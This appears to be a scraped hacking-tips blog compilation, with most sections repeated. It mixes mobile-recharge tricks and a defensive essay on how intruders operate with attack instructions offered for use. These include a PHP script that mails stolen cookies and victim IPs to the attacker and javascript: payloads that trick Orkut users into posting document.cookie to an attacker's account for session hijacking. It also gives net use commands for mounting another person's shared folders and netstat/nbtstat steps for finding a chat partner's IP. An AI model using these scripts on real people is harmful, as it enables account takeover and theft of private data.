BUT WE GET A SMALL AMOUNT OF RUPEEES 50, WHICH IS NOT SUFFICIENT.
SO FRNDS I HAVE A GOOD IDEA INSTEAD OF THAT
FIRST MAKE A REFILL OF 60rs
THEN SEND A MASSAGE AS SMS48 TO 250
U WILL GET ONE MONTH VALIDITY + 150 SMS FREE
NOW U HAVE 140rs IN UR HAND OUT OF THAT 200rs
TELL THE REFILLER TO MAKE A REFILL OF 1O0rs
HE WILL GIVE U A REFILL OF 80rs
THEN TELL HIM TO GIVE U 4 TIMES 10 WALLA CHOTA REFILL
U WILL GET 32rs.
SO FRNDS DID U UNDERSTAND HOW TO MAKE THIS SCHEME WORK
ENJOY IT!!!!!
U WILL GET
1)112rs AS UR BALANCE
2)150 FREE SMS
3)ONE MONTH VALIDITY
DAIL 181 FOR FREE
1)LIVE SCORE
2)INTERVIEW
3)MUSIC
4)ASTROLOGY
AND MANY MORE STUFFS FOR FREE
ENJOY HACKING WID ME!
FOR FREE MISSED CALL ALERT
DIVERT UR CALL, WEN BUSY TO 678
N ENJOY IT.
NOTE: THOSE WHO R CALLING U THEIR BALANCE WILL GET REDUCED, BUT NOT URS.
MANY OF US ALWAYS MAKES A RECHARGE OF 200rs TO GET ONE MONTH VALIDITY
BUT WE GET A SMALL AMOUNT OF RUPEEES 50, WHICH IS NOT SUFFICIENT.
SO FRNDS I HAVE A GOOD IDEA INSTEAD OF THAT
FIRST MAKE A REFILL OF 60rs
THEN SEND A MASSAGE AS SMS48 TO 250
U WILL GET ONE MONTH VALIDITY + 150 SMS FREE
NOW U HAVE 140rs IN UR HAND OUT OF THAT 200rs
TELL THE REFILLER TO MAKE A REFILL OF 1O0rs
HE WILL GIVE U A REFILL OF 80rs
THEN TELL HIM TO GIVE U 4 TIMES 10 WALLA CHOTA REFILL
U WILL GET 32rs.
SO FRNDS DID U UNDERSTAND HOW TO MAKE THIS SCHEME WORK
ENJOY IT!!!!!
U WILL GET
1)112rs AS UR BALANCE
2)150 FREE SMS
3)ONE MONTH VALIDITY
Fastest Way To hack Into System
Fastest Way To Hack Into Other Systems
Well as I already mentioned you can hack any system as it is conected to what we call "INTERNET". To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.
Steps: -
1. Software PORT SCANNER from google.
2. The IP address of the victim whose port is open.
3. Download NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet....
4. The IP of victim u found initially into NETLAB .
5. Thats it now you can access his system.
Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don't try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.
Good Luck!
Well as I already mentioned you can hack any system as it is conected to what we call "INTERNET". To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.
Steps: -
1. Software PORT SCANNER from google.
2. The IP address of the victim whose port is open.
3. Download NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet....
4. The IP of victim u found initially into NETLAB .
5. Thats it now you can access his system.
Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don't try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.
Good Luck!
Cookie Stealing
Cookie Stealing
For php mail sender download mysql it is a s/w like .RAR file...
if you don't have mysql then .PHP file will not work in ur pc...
1.Download mysql...ask ne for the link....or find in google...
2.Copy the code and paste in notepad and save as extention.PHP
The code is given here:-
$to="myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
?>
3.now upload on the internet...and as u give that link to anyone as he opens that link his/her coockies u will get it on ur mail......
For php mail sender download mysql it is a s/w like .RAR file...
if you don't have mysql then .PHP file will not work in ur pc...
1.Download mysql...ask ne for the link....or find in google...
2.Copy the code and paste in notepad and save as extention.PHP
The code is given here:-
$to="myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
?>
3.now upload on the internet...and as u give that link to anyone as he opens that link his/her coockies u will get it on ur mail......
Hack Attack
Hack Attack .
Did you know that a hacker could be watching you right at this very moment, reading exactly what you are reading right now, and you didn't even know they were there or how they got in?
A hacker can get into your bank account if you save your password on your PC. They can "break" your password using commonly available programs and then change your passwords to your banking accounts and PC effectively locking you out. But they don't even need to "break" your password, if they load the right program on your PC.
They can, and do ...
..steal and delete files,
..load dangerous programs onto your PC,
..involve you in computer crimes.
True story:
A woman gets up in the middle of the night and notices her PC operating all by itself, an invisible hand is controlling her mouse and opening up applications. Thinking that her PC is malfunctioning, she calls the PC manufacturer the next day. Of course, now, the PC is behaving normally. She finds that she has been infected with a commonly available trojan, and she had witnessed the hacker rummaging through her system.
Continue reading and you will learn how they get in ........
These are the 5 steps to a successful "hack".
1. Hackers look for easy targets and find out information about them and their systems.
2. Breaking into your system.
3. Getting authority to control everything on your system.
4. Hiding the evidence of their break-in.
5. They load programs and passwords on your PC to give them easy access in the future.
Scoping Their Target
Every computer that connects to the Internet is assigned an IP (Internet Protocol) address. This is very similar to a telephone number in many ways. If you have a DSL connection or cable modem connection your IP address stays the same and is "always on". If you have a "dial-up" account, then your IP address is dynamic (it changes each time you connect), and your ISP (Internet Service Provider) cuts you off after a certain amount of time of inactivity.
Dial-up accounts are less hacker friendly because your IP address changes each time you are on. This makes it impossible for the hacker to make repeat visits unless he has tricked you into loading a program on your PC that tells him when you are on-line and gives him your current IP address.
"Always on" connections are just that, always connected and open for attack. The hacker can take his time getting to know your system and it's weaknesses, searching until he finds a way in. Your only safety is in the vast numbers of open, unprotected systems.
There are many ways for the hacker to find out what your IP address is. Some of the more common methods are through chat rooms, by looking up domain names on a domain name registrar site, or by running programs that can create a log of all valid addresses.
Chat rooms are the easiest way for hackers to find out your IP address. All they have to do is right click on your chat id and they have your IP address. With your IP address in hand they can start testing your system for weaknesses.
You would be amazed at what information is available from a domain name registrar like Network Solutions. Anyone can type in the name of a domain, for example, Yahoo.com, and find out employee names, phone numbers, fax numbers, physical addresses and IP addresses.
Breaking In
A hacker wants to know your IP address and what operating system you are running. Most home PCs run Windows, so home PC hacking is easy because there are many known Window "bugs" that can be taken advantage of. Most home users have never worried about computer security.
Hackers look for commonly know system weaknesses (bugs or holes in software). The operating system, like Windows, has bugs, as do other software like browsers, such as Microsoft's Internet Explorer. They scan your open ports looking for a running program that they can take advantage of. Scanning is like a burglar who checks all the doors and windows of your house to see if any are unlocked.
Windows 95 and 98 often have File and Print Sharing option on. This allows someone to access your hard drive and load any program they want on your hard drive or delete or change any file they want on your PC. (the next page, Cyber Defense will show you how to turn this off). This access makes it very easy for a hacker to use your PC as his own.
Hackers often use trojans to break into and control home computers.
One of the most famous hackers, Kevin Metnick, used social engineering to obtain needed information to break into systems. Social engineering is where a person wants to find out information about you, so they call you and trick you into to telling them what they want to know. They then use that information to break into your or your company's system.
Basically, hackers don't need to know much of anything about you to get into your system. They are counting on the public being uninformed and use that lack of knowledge to gain access to many computers.
Getting Total Control
You may be thinking...
"I don't have to worry, my PC is password protected."
Not true!
PCs used at home did not need a lot of security features before the Internet. They were designed for convenience, not security. Windows 95 and 98 are very insecure. It takes about 10 seconds to bypass any password you have to "lock out" other people from your home PC. Don't make the mistake of thinking that because you have password protected your PC, that it is safe. IT IS NOT SAFE!
Hackers use specialized programs to "crack" passwords. Your password at work or to your bank account can give a hacker much greater control over your life or company than you realize. Choose your password carefully. Please take the time now to read about how hackers "crack" passwords and how to create a good password."
Disposing of the evidence
One way that hackers camouflage their dirty work is by changing the name of their programs to look like program names of legitimate system programs. Or they will create a hidden folder to keep all their programs in.
What is left behind
The most dangerous trojan is a "back-door" trojan. A trojan horse program is a way of tricking you to load a program onto your PC that gives a hacker access to your computer.
The name comes from the legend of Troy. Ulysses, enemy of the Trojans, leaves a wooden Trojan horse outside the gates of Troy. The Trojans believing that it is a sacrifice to the gods, bring it inside the walls of the city. What they did not know was that inside the belly of the trojan horse were Greek soldiers. At night, the Greek soldiers snuck out and opened the gates of Troy to the Greek army who then defeated the Trojans.
Software trojans are more clever, often arriving from friends who do not know what is in the cute little program that sings Merry Christmas to you. While you are enjoying the show, a nasty little trojan program could be loaded.
A "back door" trojan gives hackers complete access and control over your PC. They can see your screen, just as if they were sitting in front of it. They can watch every move you make with your mouse, every word you type, like a spy standing over your shoulder. And you will have no idea that they are there. These programs run in stealth mode, silent and deadly.
"Back door" programs are commonly available. They can be tools used to administer remote systems and are used on a daily basis in a legitimate way by system administrators.
When your PC asks you if you would like to save your password to your bank account or other important accounts, SAY NO! This little convenience of not having to remember and type in your password might give a hacker complete access to your bank account.
More often than not, the hacker is not interested in you or your system. He just wants to control your PC to hack into much larger, profitable, head-line creating sites, like government, bank, and popular sites.
One technique hackers use to attack web sites is called "denial of service attack". The hacker might send signal to all the PCs he has infected with specialized software. The software, which could be running on hundreds of PCs, simultaneously sends problem messages to the target web server and ties up all it's connections so no one new can connect, or crashes the web server, or overloads the mail server with junk mail. The effect is that legitimate customers can no longer access a service or web site. This can cost companies millions of dollars.
If your PC is used in a "Denial of Service" attack your PC is called a "ZOMBIE". When the targeted site starts to investigate who is attacking their network, they will find your IP address and your computer, not the hacker's. (At least initially) You might be held legally responsible.
Did you know that a hacker could be watching you right at this very moment, reading exactly what you are reading right now, and you didn't even know they were there or how they got in?
A hacker can get into your bank account if you save your password on your PC. They can "break" your password using commonly available programs and then change your passwords to your banking accounts and PC effectively locking you out. But they don't even need to "break" your password, if they load the right program on your PC.
They can, and do ...
..steal and delete files,
..load dangerous programs onto your PC,
..involve you in computer crimes.
True story:
A woman gets up in the middle of the night and notices her PC operating all by itself, an invisible hand is controlling her mouse and opening up applications. Thinking that her PC is malfunctioning, she calls the PC manufacturer the next day. Of course, now, the PC is behaving normally. She finds that she has been infected with a commonly available trojan, and she had witnessed the hacker rummaging through her system.
Continue reading and you will learn how they get in ........
These are the 5 steps to a successful "hack".
1. Hackers look for easy targets and find out information about them and their systems.
2. Breaking into your system.
3. Getting authority to control everything on your system.
4. Hiding the evidence of their break-in.
5. They load programs and passwords on your PC to give them easy access in the future.
Scoping Their Target
Every computer that connects to the Internet is assigned an IP (Internet Protocol) address. This is very similar to a telephone number in many ways. If you have a DSL connection or cable modem connection your IP address stays the same and is "always on". If you have a "dial-up" account, then your IP address is dynamic (it changes each time you connect), and your ISP (Internet Service Provider) cuts you off after a certain amount of time of inactivity.
Dial-up accounts are less hacker friendly because your IP address changes each time you are on. This makes it impossible for the hacker to make repeat visits unless he has tricked you into loading a program on your PC that tells him when you are on-line and gives him your current IP address.
"Always on" connections are just that, always connected and open for attack. The hacker can take his time getting to know your system and it's weaknesses, searching until he finds a way in. Your only safety is in the vast numbers of open, unprotected systems.
There are many ways for the hacker to find out what your IP address is. Some of the more common methods are through chat rooms, by looking up domain names on a domain name registrar site, or by running programs that can create a log of all valid addresses.
Chat rooms are the easiest way for hackers to find out your IP address. All they have to do is right click on your chat id and they have your IP address. With your IP address in hand they can start testing your system for weaknesses.
You would be amazed at what information is available from a domain name registrar like Network Solutions. Anyone can type in the name of a domain, for example, Yahoo.com, and find out employee names, phone numbers, fax numbers, physical addresses and IP addresses.
Breaking In
A hacker wants to know your IP address and what operating system you are running. Most home PCs run Windows, so home PC hacking is easy because there are many known Window "bugs" that can be taken advantage of. Most home users have never worried about computer security.
Hackers look for commonly know system weaknesses (bugs or holes in software). The operating system, like Windows, has bugs, as do other software like browsers, such as Microsoft's Internet Explorer. They scan your open ports looking for a running program that they can take advantage of. Scanning is like a burglar who checks all the doors and windows of your house to see if any are unlocked.
Windows 95 and 98 often have File and Print Sharing option on. This allows someone to access your hard drive and load any program they want on your hard drive or delete or change any file they want on your PC. (the next page, Cyber Defense will show you how to turn this off). This access makes it very easy for a hacker to use your PC as his own.
Hackers often use trojans to break into and control home computers.
One of the most famous hackers, Kevin Metnick, used social engineering to obtain needed information to break into systems. Social engineering is where a person wants to find out information about you, so they call you and trick you into to telling them what they want to know. They then use that information to break into your or your company's system.
Basically, hackers don't need to know much of anything about you to get into your system. They are counting on the public being uninformed and use that lack of knowledge to gain access to many computers.
Getting Total Control
You may be thinking...
"I don't have to worry, my PC is password protected."
Not true!
PCs used at home did not need a lot of security features before the Internet. They were designed for convenience, not security. Windows 95 and 98 are very insecure. It takes about 10 seconds to bypass any password you have to "lock out" other people from your home PC. Don't make the mistake of thinking that because you have password protected your PC, that it is safe. IT IS NOT SAFE!
Hackers use specialized programs to "crack" passwords. Your password at work or to your bank account can give a hacker much greater control over your life or company than you realize. Choose your password carefully. Please take the time now to read about how hackers "crack" passwords and how to create a good password."
Disposing of the evidence
One way that hackers camouflage their dirty work is by changing the name of their programs to look like program names of legitimate system programs. Or they will create a hidden folder to keep all their programs in.
What is left behind
The most dangerous trojan is a "back-door" trojan. A trojan horse program is a way of tricking you to load a program onto your PC that gives a hacker access to your computer.
The name comes from the legend of Troy. Ulysses, enemy of the Trojans, leaves a wooden Trojan horse outside the gates of Troy. The Trojans believing that it is a sacrifice to the gods, bring it inside the walls of the city. What they did not know was that inside the belly of the trojan horse were Greek soldiers. At night, the Greek soldiers snuck out and opened the gates of Troy to the Greek army who then defeated the Trojans.
Software trojans are more clever, often arriving from friends who do not know what is in the cute little program that sings Merry Christmas to you. While you are enjoying the show, a nasty little trojan program could be loaded.
A "back door" trojan gives hackers complete access and control over your PC. They can see your screen, just as if they were sitting in front of it. They can watch every move you make with your mouse, every word you type, like a spy standing over your shoulder. And you will have no idea that they are there. These programs run in stealth mode, silent and deadly.
"Back door" programs are commonly available. They can be tools used to administer remote systems and are used on a daily basis in a legitimate way by system administrators.
When your PC asks you if you would like to save your password to your bank account or other important accounts, SAY NO! This little convenience of not having to remember and type in your password might give a hacker complete access to your bank account.
More often than not, the hacker is not interested in you or your system. He just wants to control your PC to hack into much larger, profitable, head-line creating sites, like government, bank, and popular sites.
One technique hackers use to attack web sites is called "denial of service attack". The hacker might send signal to all the PCs he has infected with specialized software. The software, which could be running on hundreds of PCs, simultaneously sends problem messages to the target web server and ties up all it's connections so no one new can connect, or crashes the web server, or overloads the mail server with junk mail. The effect is that legitimate customers can no longer access a service or web site. This can cost companies millions of dollars.
If your PC is used in a "Denial of Service" attack your PC is called a "ZOMBIE". When the targeted site starts to investigate who is attacking their network, they will find your IP address and your computer, not the hacker's. (At least initially) You might be held legally responsible.
Free Calls Anywhere
MAKE FREE CALLS TO ANYWHERE IN THE WORLD
(mobile or landline)
--> Install any of the following...
Gizmo project.... from http://www.gizmoproject.com
Skype.... from http://www.skype.com
Globe7.... from http://www.globe7.com
then dial 18003733411 and follow the instructions...
Its free no balance required to make
call to this number...
for details.. . visit http://www.free411.com
(mobile or landline)
--> Install any of the following...
Gizmo project.... from http://www.gizmoproject.com
Skype.... from http://www.skype.com
Globe7.... from http://www.globe7.com
then dial 18003733411 and follow the instructions...
Its free no balance required to make
call to this number...
for details.. . visit http://www.free411.com
Pc Hacking
Hack Computer Easily (NOOB TRICK)
Posted by Varun in Extreme Hacking
[GEEK]
I will break this down so simple that anyone can do this:
So you get your friends ip: 192.168.0.1 (example)
1st rule: He do not have COX
2nd rule: He do not have a firewall
3rd rule: you do not have COX
open a command prompt window
Type Net view \\192.168.0.1
you will see all of his shared folders, documents, etc...
In the command prompt window type:
net use s: \\192.168.0.1\(NAME OF SHARED FOLDER GOES HERE)
It will say command completed succesfully
Open My computer
You will now see you have an S: Drive
Posted by Varun in Extreme Hacking
[GEEK]
I will break this down so simple that anyone can do this:
So you get your friends ip: 192.168.0.1 (example)
1st rule: He do not have COX
2nd rule: He do not have a firewall
3rd rule: you do not have COX
open a command prompt window
Type Net view \\192.168.0.1
you will see all of his shared folders, documents, etc...
In the command prompt window type:
net use s: \\192.168.0.1\(NAME OF SHARED FOLDER GOES HERE)
It will say command completed succesfully
Open My computer
You will now see you have an S: Drive
Orkut Hacking
Hack Orkut Accounts
First get firefox and the cookie editor plugin for it...u will need them...
Then make two fake accounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...the choice is yours though..javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
U see the 62915936 part? Thats the one u need to edit to get the cookie to your account.....Now here is the script Code:
HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
1) Go to YOUR ALBUM section.
2) Go to ANY photo and right click on it , see the properties of your display image...u will see something like 12345678.jpg
3) There will be a eight digit value.
4) Now put that value in the above javascript.
5) Thats it.
Now your javascript will look like:
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.
Now after getting a cookie...
1) Go to your home page
2) Open the cookie editor plugin(TOOLS-->COOKIE EDITOR).
3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.
4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part...
5) THATS IT!!
ANOTHER SCRIPT : (100%working)
javascript:nobody=replyForm;nobody.toUserId.value=53093255;
nobody.scrapText.value=document.cookie;nobody.
action='scrapbook.aspx?Action.submit';nobody.submit()
Put ur eight digit number in the place of (53093255)
First get firefox and the cookie editor plugin for it...u will need them...
Then make two fake accounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...the choice is yours though..javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
U see the 62915936 part? Thats the one u need to edit to get the cookie to your account.....Now here is the script Code:
HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
1) Go to YOUR ALBUM section.
2) Go to ANY photo and right click on it , see the properties of your display image...u will see something like 12345678.jpg
3) There will be a eight digit value.
4) Now put that value in the above javascript.
5) Thats it.
Now your javascript will look like:
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()
Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.
Now after getting a cookie...
1) Go to your home page
2) Open the cookie editor plugin(TOOLS-->COOKIE EDITOR).
3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.
4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part...
5) THATS IT!!
ANOTHER SCRIPT : (100%working)
javascript:nobody=replyForm;nobody.toUserId.value=53093255;
nobody.scrapText.value=document.cookie;nobody.
action='scrapbook.aspx?Action.submit';nobody.submit()
Put ur eight digit number in the place of (53093255)
Hack Yahoo While Chatting
HACK YAHOO ID WHILE CHATTING
HACK YAHOO ID WHILE CHATTING
HACK YAHOO ACCOUNT WHILE CHATTING
This is only for education purpose.So who ever try this is at his risk.
I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here
Following are the feature : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio
1) Go to cmd(dos)
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------
-----
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
good luck my friends try it and enjoy!!!!!!!!!!!!!!!!!!!!!!!!!!.
HAPPY HACKING
HACK YAHOO ID WHILE CHATTING
HACK YAHOO ACCOUNT WHILE CHATTING
This is only for education purpose.So who ever try this is at his risk.
I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here
Following are the feature : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio
1) Go to cmd(dos)
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------
-----
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
good luck my friends try it and enjoy!!!!!!!!!!!!!!!!!!!!!!!!!!.
HAPPY HACKING
Hacking For Dummies
How to learn to hack in easy steps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction
~~~~~~~~~~~~
Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've
met. I want to write this because most tutorials i've found (very good tutorials) are now
old and don't fit just like they did before. This is why i'm going to teach you and show you
the way to learn to hack.
If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.
I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.
On this document I talk about many security tools, you can find all them and also contact
me on my site: www.3b0x.com
When you finish reading it, please TELL ME how you like it!
I want to make newer versions of it, check on my site to stay informed.
COPYING: You're welcome to distribute this document to whoever the hell you want, post it
on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
If you want to perform it, ask me for permission. thanks a lot!
DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
promote computer crime and I'm not responible of your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.
Let's start
~~~~~~~~~~~
If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.
NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.
Some definitions
~~~~~~~~~~~~~~~~
I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.
The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.
I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.
Operating Systems
~~~~~~~~~~~~~~~~~
Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.
You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:
-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
than running it at home?
-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.
Let's see where to find the unix you're interested on.
The UNIX systems may be divided in two main groups:
- commercial UNIXes
- free opensource UNIXes
A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.
The free opensource UNIXes can also be divided in:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.
- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.
I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.
Visit www.suse.de and look for a local store or order it online.
(i know i said it the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)
If you own an intel box, then order the PC version.
If you own a mac box, then order the PowerPC version.
Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.
It's possible you have problem with your hardware on the installation. Read the manual, ask
